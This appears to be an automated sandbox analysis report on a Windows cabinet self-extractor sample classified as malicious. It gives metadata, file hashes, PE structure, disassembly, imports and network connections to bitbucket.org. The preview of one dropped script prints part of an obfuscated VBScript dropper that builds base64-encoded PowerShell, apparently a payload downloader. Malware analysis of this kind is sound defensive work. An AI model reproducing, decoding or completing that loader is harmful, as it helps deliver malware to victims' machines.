                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/jsi18n/en/djpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://go.micropowershell.exe, 00000007.00000002.2175735528.00000218AC09A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://id.atlassian.com/logoutpowershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000007.00000002.2175735528.00000218ACB7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://id.atlassian.com/manage-profile/powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/dist/webpackpowershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.mpowershell.exe, 00000007.00000002.2202729046.00000218C34F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://cdn.cookielaw.org/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=dpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/themes/apowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://aka.ms/pscore68powershell.exe, 00000005.00000002.2211178390.000001DB2C6AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
IP: 185.166.143.49
Domain: bitbucket.org
Country: Germany
ASN: 16509
ASN Name: AMAZON-02US
Malicious: false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1604514
Start date and time: 2025-02-01 16:42:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 00wVZ1NU5b.exe (renamed because original name is a hash value)
Original Sample Name: a11a8da90ad22616ca604476cb9f2749.exe
Detection: MAL
Classification: mal100.expl.evad.winEXE@12/8@1/1
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 33.3%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 32
                                                                                                                • Number of non-executed functions: 36
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.61
                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 5936 because it is empty
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6568 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time: 10:43:44
Type: API Interceptor
Description: 35x Sleep call for process: powershell.exe modified
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.773832331134527
Encrypted: false
SSDEEP: 3:NlllulE///:NllUE
MD5: B4DE26A7324FA4FC327B4F25179DA553
SHA1: D6B1969ABA866CB1D66F0E07807274B88F4D066B
SHA-256: 03265D17C846083859005C1B74486351E2AB14BE6B7DA58B94DDAC870C2A6637
SHA-512: A525B72C79098A88E461554A020D0424A024CD18466AB87E98CAF26C2E99BC264C39E2607A7444FBEC0A041DE588A69266B4F3C4F89D681DA41264E966145D8F
Malicious: false
Reputation: low
Preview: @...e...........................................................
Process: C:\Users\user\Desktop\00wVZ1NU5b.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15054
                                                                                                                Entropy (8bit):5.4299718814514195
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:Kn+mfSZHNCjlcMWY/YinblBmnAbYXhMgE732JCjc7NF9Wu0MDxpnO/9SjozM:K+I08gib/mAbYXy29v10MFpWSjoA
                                                                                                                MD5:B12BAE993C0BA4C1A05610AD2C5D77F8
                                                                                                                SHA1:9083D25DDE4D8BFA0CFE5198760321A1281ADAEF
                                                                                                                SHA-256:671C8F1262CFA0155AC7DEC62780A141061889E4F1E14429615C528121EF881C
                                                                                                                SHA-512:B99534FF8EC410C9BE0879AD0147065ABB72756CA400C033B78266CD1E44BCDE47DB531DC199CE34C4474099EA59146BB5CF4A18274FB8A4C3002AD21D6A86AC
                                                                                                                Malicious:true
                                                                                                                Preview: 'g..SriiIehmrgm = rRegisggfgdsadffghgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@")..Call Ugsfisging("UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@")..omahmdS = TimeSerial(8,8,8)..Public Const grhroopc = "ArmeFockf"..oSrodfok = "hffhfg" & LenB("pnkAhrc") & "hfg"..'dAIagSk aImckdrgp..kjIImjj = TimeSerial(7,9,9)..Public Const cmrbSbA = "dpSiiSdc"..Call Ugsfisging("dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@")..Call Ugsfisging("DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgB")..Call Ugsfisging("s@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):6.4375581583443795
                                                                                                                TrID:
                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:00wVZ1NU5b.exe
                                                                                                                File size:180'224 bytes
                                                                                                                MD5:a11a8da90ad22616ca604476cb9f2749
                                                                                                                SHA1:a877ecdacdda321bfd73ecd8b18584725fd11cbb
                                                                                                                SHA256:e52a775c02065896cacd99b1f7141c40aea77edc9fdbbfa69b900ce1c050d62c
                                                                                                                SHA512:f75731183ea8b390c3ae47de480f7e27e7beadd3908e8b2c9cf1684197827bdb42fd44e62fb2e5a8b121abfe4bca93d871f3d1ab6701114b911e77ffac884c1c
                                                                                                                SSDEEP:3072:+HwrxmMpvDITZg1SK5GWp1icKAArDZz4N9GhbkrNEk1dr:xrMZkp0yN90QEW
                                                                                                                TLSH:C3048D0A67E520A6E4B6677498F203835A317CB26B7492FF13C4D57E0E336D0A532B57
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"
                                                                                                                Icon Hash:3b6120282c4c5a1f
                                                                                                                Entrypoint:0x140008460
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x140000000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:10
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:10
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:10
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                                                                                                                Instruction
                                                                                                                dec eax
                                                                                                                sub esp, 28h
                                                                                                                call 00007FE1FC7FE9D0h
                                                                                                                dec eax
                                                                                                                add esp, 28h
                                                                                                                jmp 00007FE1FC7FE24Bh
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+08h], ebx
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+10h], edi
                                                                                                                inc ecx
                                                                                                                push esi
                                                                                                                dec eax
                                                                                                                sub esp, 000000B0h
                                                                                                                and dword ptr [esp+20h], 00000000h
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                call dword ptr [00000F8Dh]
                                                                                                                nop
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [00000030h]
                                                                                                                dec eax
                                                                                                                mov ebx, dword ptr [eax+08h]
                                                                                                                xor edi, edi
                                                                                                                xor eax, eax
                                                                                                                dec eax
                                                                                                                cmpxchg dword ptr [000046C2h], ebx
                                                                                                                je 00007FE1FC7FE24Ch
                                                                                                                dec eax
                                                                                                                cmp eax, ebx
                                                                                                                jne 00007FE1FC7FE25Fh
                                                                                                                mov edi, 00000001h
                                                                                                                mov eax, dword ptr [000046B8h]
                                                                                                                cmp eax, 01h
                                                                                                                jne 00007FE1FC7FE25Ch
                                                                                                                lea ecx, dword ptr [eax+1Eh]
                                                                                                                call 00007FE1FC7FE863h
                                                                                                                jmp 00007FE1FC7FE2C9h
                                                                                                                mov ecx, 000003E8h
                                                                                                                call dword ptr [00000F3Bh]
                                                                                                                jmp 00007FE1FC7FE206h
                                                                                                                mov eax, dword ptr [00004693h]
                                                                                                                test eax, eax
                                                                                                                jne 00007FE1FC7FE2A5h
                                                                                                                mov dword ptr [00004685h], 00000001h
                                                                                                                dec esp
                                                                                                                lea esi, dword ptr [000011BEh]
                                                                                                                dec eax
                                                                                                                lea ebx, dword ptr [0000119Fh]
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+30h], ebx
                                                                                                                mov dword ptr [esp+24h], eax
                                                                                                                dec ecx
                                                                                                                cmp ebx, esi
                                                                                                                jnc 00007FE1FC7FE271h
                                                                                                                test eax, eax
                                                                                                                jne 00007FE1FC7FE271h
                                                                                                                dec eax
                                                                                                                cmp dword ptr [ebx], 00000000h
                                                                                                                je 00007FE1FC7FE25Ch
                                                                                                                dec ecx
                                                                                                                mov edx, 5E523070h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2b4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1ccac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x42c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x2c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a68 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9148 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7e40 | 0x8000 | d22d8a48c14d2185814d2ed24fb0aed1 | False | 0.546173095703125 | data | 6.092855112591348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2340 | 0x3000 | 3748ff8966297360bdba725e2d585c23 | False | 0.318359375 | data | 3.84344715350442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x1000 | f198899505f620007167379f74f8141c | False | 0.083251953125 | data | 1.0384025678015962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x42c | 0x1000 | 2d9ecb32a70228f2b07b654e216a79ee | False | 0.156005859375 | data | 1.4378876073270839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1d000 | 0x1d000 | a5961682fea5ad4ab587d57da1992791 | False | 0.735174771012931 | data | 7.04811713110433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x2c | 0x1000 | cf22972a59e8c2a2ad0453d649f2025d | False | 0.017578125 | data | 0.10781936458684958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x1720 | Microsoft Cabinet archive data, Windows 2000/XP setup, 5920 bytes, 1 file, at 0x2c +A "lol.vbs", ID 704, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0018581081081082
RT_RCDATA | 0x2af90 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2af94 | 0x24 | data | English | United States | 0.7222222222222222
RT_RCDATA | 0x2afb8 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2afc0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2afc8 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2afcc | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2afd4 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2afd8 | 0xf | ASCII text, with no line terminators | English | United States | 1.5333333333333334
RT_RCDATA | 0x2afe8 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2afec | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2aff0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2aff8 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2b000 | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2b0bc | 0x408 | data | English | United States | 0.42248062015503873
RT_MANIFEST | 0x2b4c4 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Description | Data
CompanyName | Microsoft Corporation
FileDescription | Win32 Cabinet Self-Extractor
FileVersion | 11.00.20348.1 (WinBuild.160101.0800)
InternalName | Wextract
LegalCopyright | Microsoft Corporation. All rights reserved.
OriginalFilename | WEXTRACT.EXE .MUI
ProductName | Internet Explorer
ProductVersion | 11.00.20348.1
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 1, 2025 16:43:45.148477077 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:45.148511887 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:45.148627043 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:45.156668901 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:45.156686068 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:45.812035084 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:45.812119007 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:45.816448927 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:45.816457987 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:45.816783905 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:45.828485966 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:45.875338078 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.225512981 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.225543022 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.225559950 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.225646973 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:46.225667000 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.225697041 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:46.225719929 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:46.307034016 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.307132006 CET | 443 | 49709 | 185.166.143.49 | 192.168.2.6
Feb 1, 2025 16:43:46.307302952 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:46.307302952 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Feb 1, 2025 16:43:46.328020096 CET | 49709 | 443 | 192.168.2.6 | 185.166.143.49
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 1, 2025 16:43:45.127779961 CET | 63938 | 53 | 192.168.2.6 | 1.1.1.1
